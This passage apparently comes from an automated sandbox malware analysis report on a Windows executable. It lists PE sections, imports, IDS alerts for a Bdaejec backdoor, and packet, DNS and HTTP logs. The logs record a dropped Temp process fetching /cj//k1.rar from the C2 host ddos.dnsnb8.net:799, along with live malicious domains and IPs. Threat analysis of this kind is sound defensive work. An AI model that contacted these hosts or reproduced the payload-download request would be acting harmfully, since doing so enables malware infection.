.reloc	0x1b5000	0x80d4	0x8200	26a93cabdfe65efede018ff101864f68	False	0.708203125	data	6.647793149697268	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
=Jcu	0x1be000	0x5000	0x4200	9b31c0f358f52fe53e51e7c39ee345c9	False	0.7775213068181818	data	6.934615013255218	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
ZIP	0x1a8138	0xc4af	Zip archive data, at least v1.0 to extract, compression method=store	Chinese	China	0.9677861412881571
RT_ICON	0x14f390	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 128	Chinese	China	0.7302631578947368
RT_ICON	0x14f4c0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.4121951219512195
RT_ICON	0x14fb28	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.5134408602150538
RT_ICON	0x14fe10	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.597972972972973
RT_ICON	0x14ff38	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.5650319829424307
RT_ICON	0x150de0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.6159747292418772
RT_ICON	0x151688	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.4277456647398844
RT_ICON	0x151bf0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	Chinese	China	0.11034263396159423
RT_ICON	0x193c18	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.15828699869868687
RT_ICON	0x1a4440	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.27344398340248965
RT_ICON	0x1a69e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.3550656660412758
RT_ICON	0x1a7a90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.526595744680851
RT_GROUP_ICON	0x1a7ef8	0xae	data	Chinese	China	0.6149425287356322
RT_VERSION	0x1a7fa8	0x18c	PGP symmetric key encrypted data - Plaintext or unencrypted data	Chinese	China	0.5656565656565656
RT_MANIFEST	0x1b45e8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GetComputerNameW, GetModuleFileNameA, GetCurrentProcessId, OpenProcess, GetModuleFileNameW, SetLastError, WaitForSingleObject, CreateEventW, FreeLibrary, WinExec, GetPrivateProfileStringW, CopyFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, LocalFree, LocalAlloc, LoadResource, FindResourceW, SizeofResource, LockResource, GetTickCount, GetCurrentThread, Sleep, GetProcessHeap, HeapAlloc, GetLastError, GetTempPathA, SetCurrentDirectoryW, GetShortPathNameA, LoadLibraryW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, SystemTimeToFileTime, DosDateTimeToFileTime, GetCurrentProcess, DuplicateHandle, CloseHandle, WriteFile, SetFileTime, SetFilePointer, ReadFile, GetFileType, CreateFileW, CreateDirectoryW, TerminateProcess, GetCurrentDirectoryW, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, GetTimeZoneInformation, GetFileSizeEx, GetConsoleOutputCP, SetFilePointerEx, ReadConsoleW, GetConsoleMode, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetCommandLineW, GetCommandLineA, GetStdHandle, ExitProcess, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, RtlUnwind, RaiseException, GetStringTypeW, WriteConsoleW, GetCPInfo, CompareStringEx, LCMapStringEx, DecodePointer, EncodePointer, InitializeCriticalSectionEx, InitializeSListHead, GetStartupInfoW, IsDebuggerPresent, GetModuleHandleW, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FlushFileBuffers, QueryPerformanceCounter, MapViewOfFile, CreateFileMappingW, AreFileApisANSI, TryEnterCriticalSection, HeapCreate, HeapFree, EnterCriticalSection, GetFullPathNameW, GetDiskFreeSpaceW, OutputDebugStringA, LockFile, LeaveCriticalSection, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, FormatMessageW, GetDiskFreeSpaceA, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, FlushViewOfFile, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, GetSystemInfo, HeapCompact, HeapDestroy, UnlockFile, LockFileEx, GetFileSize, DeleteCriticalSection, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA
ADVAPI32.dll	LookupPrivilegeValueW, AdjustTokenPrivileges, LookupAccountNameW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, IsValidSecurityDescriptor, InitializeSecurityDescriptor, InitializeAcl, GetTokenInformation, GetLengthSid, FreeSid, EqualSid, DuplicateToken, AllocateAndInitializeSid, AddAccessAllowedAce, AccessCheck, OpenThreadToken, OpenProcessToken
SHELL32.dll	ShellExecuteExA
ole32.dll	CoInitializeEx, CoGetObject, CoUninitialize
WININET.dll	InternetGetCookieExA
NETAPI32.dll	Netbios
ntdll.dll	RtlInitUnicodeString, NtFreeVirtualMemory, LdrEnumerateLoadedModules, RtlEqualUnicodeString, RtlAcquirePebLock, NtAllocateVirtualMemory, RtlReleasePebLock, RtlNtStatusToDosError, RtlCreateHeap, RtlDestroyHeap, RtlAllocateHeap, RtlFreeHeap, NtClose, NtOpenKey, NtEnumerateValueKey, NtQueryValueKey

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T17:32:58.302312+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	65389	53	192.168.2.7	1.1.1.1
2024-07-24T17:33:09.618305+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49706	799	192.168.2.7	44.221.84.105
2024-07-24T17:33:03.941904+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49704	799	192.168.2.7	44.221.84.105
2024-07-24T17:33:06.916379+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49705	799	192.168.2.7	44.221.84.105
2024-07-24T17:33:00.043959+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49699	799	192.168.2.7	44.221.84.105
2024-07-24T17:33:12.689053+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49708	799	192.168.2.7	44.221.84.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 17:32:58.418312073 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:32:58.766522884 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:32:58.766607046 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:32:58.785686016 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:32:58.801038027 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:32:58.868598938 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:32:58.868650913 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:32:58.868716955 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:32:59.059973955 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:32:59.060019970 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.043832064 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:00.043874979 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:00.043958902 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:00.044204950 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:00.044256926 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:00.046525955 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:00.047475100 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:00.047544956 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:00.057456017 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:00.619029045 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.619132042 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.798557043 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.798595905 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.798922062 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.798994064 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.806597948 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.852499962 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.939225912 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.939316988 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:00.939342976 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.939421892 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.947741985 CEST	49700	443	192.168.2.7	172.232.25.148
Jul 24, 2024 17:33:00.947808027 CEST	443	49700	172.232.25.148	192.168.2.7
Jul 24, 2024 17:33:01.067576885 CEST	49701	80	192.168.2.7	67.225.218.41
Jul 24, 2024 17:33:01.072664022 CEST	80	49701	67.225.218.41	192.168.2.7
Jul 24, 2024 17:33:01.073975086 CEST	49701	80	192.168.2.7	67.225.218.41
Jul 24, 2024 17:33:01.076133013 CEST	49701	80	192.168.2.7	67.225.218.41
Jul 24, 2024 17:33:01.081332922 CEST	80	49701	67.225.218.41	192.168.2.7
Jul 24, 2024 17:33:01.627686024 CEST	80	49701	67.225.218.41	192.168.2.7
Jul 24, 2024 17:33:01.630676031 CEST	49701	80	192.168.2.7	67.225.218.41
Jul 24, 2024 17:33:01.775455952 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:01.780492067 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:01.780575037 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:01.801973104 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:01.807554960 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.602264881 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.602329969 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.603635073 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.603648901 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.603687048 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.606439114 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.606453896 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.606482983 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.606503010 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.609065056 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.609078884 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.609091043 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.609111071 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.609127045 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.611963987 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.611979961 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.612008095 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.612035990 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.614866018 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.614912033 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.615717888 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.615765095 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.616863966 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.616878033 CEST	80	49702	13.248.148.254	192.168.2.7
Jul 24, 2024 17:33:02.616911888 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.616928101 CEST	49702	80	192.168.2.7	13.248.148.254
Jul 24, 2024 17:33:02.713464975 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:02.713516951 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:02.713720083 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:02.714843035 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:02.714857101 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.215061903 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.215146065 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.219728947 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.219744921 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.219974995 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.220030069 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.220407963 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.264508963 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.508646011 CEST	49704	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:03.513818979 CEST	799	49704	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:03.513907909 CEST	49704	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:03.514079094 CEST	49704	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:03.518892050 CEST	799	49704	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:03.732316971 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.732410908 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.732414007 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.732465029 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.844597101 CEST	49703	443	192.168.2.7	172.67.132.113
Jul 24, 2024 17:33:03.844647884 CEST	443	49703	172.67.132.113	192.168.2.7
Jul 24, 2024 17:33:03.941831112 CEST	799	49704	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:03.941904068 CEST	49704	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:03.941991091 CEST	799	49704	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:03.942040920 CEST	49704	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:03.942990065 CEST	49704	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:03.947936058 CEST	799	49704	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:06.257886887 CEST	49705	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:06.272443056 CEST	799	49705	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:06.272576094 CEST	49705	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:06.272958994 CEST	49705	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:06.277782917 CEST	799	49705	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:06.916256905 CEST	799	49705	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:06.916378975 CEST	49705	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:06.946146011 CEST	799	49705	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:06.946259975 CEST	49705	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:06.948009968 CEST	49705	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:06.953454018 CEST	799	49705	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:09.050967932 CEST	49706	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:09.072537899 CEST	799	49706	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:09.072675943 CEST	49706	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:09.072983980 CEST	49706	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:09.077866077 CEST	799	49706	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:09.618141890 CEST	799	49706	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:09.618163109 CEST	799	49706	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:09.618171930 CEST	799	49706	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:09.618304968 CEST	49706	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:09.619366884 CEST	49706	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:09.626207113 CEST	799	49706	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:12.018203020 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.026123047 CEST	799	49708	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:12.026200056 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.026657104 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.031534910 CEST	799	49708	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:12.688983917 CEST	799	49708	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:12.689014912 CEST	799	49708	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:12.689053059 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.689081907 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.689264059 CEST	799	49708	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:12.689305067 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.713597059 CEST	49708	799	192.168.2.7	44.221.84.105
Jul 24, 2024 17:33:12.722480059 CEST	799	49708	44.221.84.105	192.168.2.7
Jul 24, 2024 17:33:13.162898064 CEST	80	49701	67.225.218.41	192.168.2.7
Jul 24, 2024 17:33:13.162977934 CEST	49701	80	192.168.2.7	67.225.218.41
Jul 24, 2024 17:33:36.941479921 CEST	49701	80	192.168.2.7	67.225.218.41
Jul 24, 2024 17:33:36.941555023 CEST	49702	80	192.168.2.7	13.248.148.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 17:32:58.302311897 CEST	65389	53	192.168.2.7	1.1.1.1
Jul 24, 2024 17:32:58.405122042 CEST	53	65389	1.1.1.1	192.168.2.7
Jul 24, 2024 17:32:58.441833973 CEST	51603	53	192.168.2.7	1.1.1.1
Jul 24, 2024 17:32:58.799782991 CEST	53	51603	1.1.1.1	192.168.2.7
Jul 24, 2024 17:33:00.955671072 CEST	61322	53	192.168.2.7	1.1.1.1
Jul 24, 2024 17:33:01.066565990 CEST	53	61322	1.1.1.1	192.168.2.7
Jul 24, 2024 17:33:01.634449005 CEST	62145	53	192.168.2.7	1.1.1.1
Jul 24, 2024 17:33:01.744776011 CEST	53	62145	1.1.1.1	192.168.2.7
Jul 24, 2024 17:33:02.641992092 CEST	63470	53	192.168.2.7	1.1.1.1
Jul 24, 2024 17:33:02.652383089 CEST	53	63470	1.1.1.1	192.168.2.7
Jul 24, 2024 17:33:31.663727999 CEST	53	57016	162.159.36.2	192.168.2.7
Jul 24, 2024 17:33:32.189028978 CEST	53625	53	192.168.2.7	1.1.1.1
Jul 24, 2024 17:33:32.239583015 CEST	53	53625	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 17:32:58.302311897 CEST	192.168.2.7	1.1.1.1	0x99de	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:32:58.441833973 CEST	192.168.2.7	1.1.1.1	0x3bcb	Standard query (0)	www.icodeps.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:00.955671072 CEST	192.168.2.7	1.1.1.1	0xc008	Standard query (0)	ww99.icodeps.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:01.634449005 CEST	192.168.2.7	1.1.1.1	0xd7c5	Standard query (0)	ww12.icodeps.com	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:02.641992092 CEST	192.168.2.7	1.1.1.1	0xf35	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:32.189028978 CEST	192.168.2.7	1.1.1.1	0x6e95	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 17:32:58.405122042 CEST	1.1.1.1	192.168.2.7	0x99de	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:32:58.799782991 CEST	1.1.1.1	192.168.2.7	0x3bcb	No error (0)	www.icodeps.com		172.232.25.148	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:32:58.799782991 CEST	1.1.1.1	192.168.2.7	0x3bcb	No error (0)	www.icodeps.com		172.232.31.180	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:32:58.799782991 CEST	1.1.1.1	192.168.2.7	0x3bcb	No error (0)	www.icodeps.com		172.232.4.213	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:01.066565990 CEST	1.1.1.1	192.168.2.7	0xc008	No error (0)	ww99.icodeps.com		67.225.218.41	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:01.744776011 CEST	1.1.1.1	192.168.2.7	0xd7c5	No error (0)	ww12.icodeps.com	765534.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 17:33:01.744776011 CEST	1.1.1.1	192.168.2.7	0xd7c5	No error (0)	765534.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:01.744776011 CEST	1.1.1.1	192.168.2.7	0xd7c5	No error (0)	765534.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:02.652383089 CEST	1.1.1.1	192.168.2.7	0xf35	No error (0)	iplogger.org		172.67.132.113	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:02.652383089 CEST	1.1.1.1	192.168.2.7	0xf35	No error (0)	iplogger.org		104.21.4.208	A (IP address)	IN (0x0001)	false
Jul 24, 2024 17:33:32.239583015 CEST	1.1.1.1	192.168.2.7	0x6e95	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

www.icodeps.com

iplogger.org

ddos.dnsnb8.net:799

ww99.icodeps.com

ww12.icodeps.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	44.221.84.105	799	2876	C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:32:58.785686016 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	67.225.218.41	80	3212	C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:33:01.076133013 CEST	218	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Cache-Control: no-cache Host: ww99.icodeps.com Connection: Keep-Alive
Jul 24, 2024 17:33:01.627686024 CEST	350	IN	HTTP/1.1 302 Moved Temporarily Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Date: Wed, 24 Jul 2024 15:33:01 GMT Location: http://ww12.icodeps.com/?usid=26&utid=7334446481 Pragma: no-cache Connection: Keep-Alive X-Powered-By: PHP/5.4.16 Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49702	13.248.148.254	80	3212	C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:33:01.801973104 CEST	242	OUT	GET /?usid=26&utid=7334446481 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Cache-Control: no-cache Connection: Keep-Alive Host: ww12.icodeps.com
Jul 24, 2024 17:33:02.602264881 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 15:33:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Server: nginx Vary: Accept-Encoding Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_KUn2QqA8onBtTl2dDA+Tc0sz9jjFS4GTWhTuJb4r9BkmG1pUIXKakwDuxn+OreG1D5yjyP5yvVtaScxD+iKZeA== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: icodeps.com X-Subdomain: ww12 Data Raw: 31 64 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 4b 55 6e 32 51 71 41 38 6f 6e 42 74 54 6c 32 64 44 41 2b 54 63 30 73 7a 39 6a 6a 46 53 34 47 54 57 68 54 75 4a 62 34 72 39 42 6b 6d 47 31 70 55 49 58 4b 61 6b 77 44 75 78 6e 2b 4f 72 65 47 31 44 35 79 6a 79 50 35 79 76 56 74 61 53 63 78 44 2b 69 4b 5a 65 41 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED] Data Ascii: 1d1f<!DOCTYPE html><html 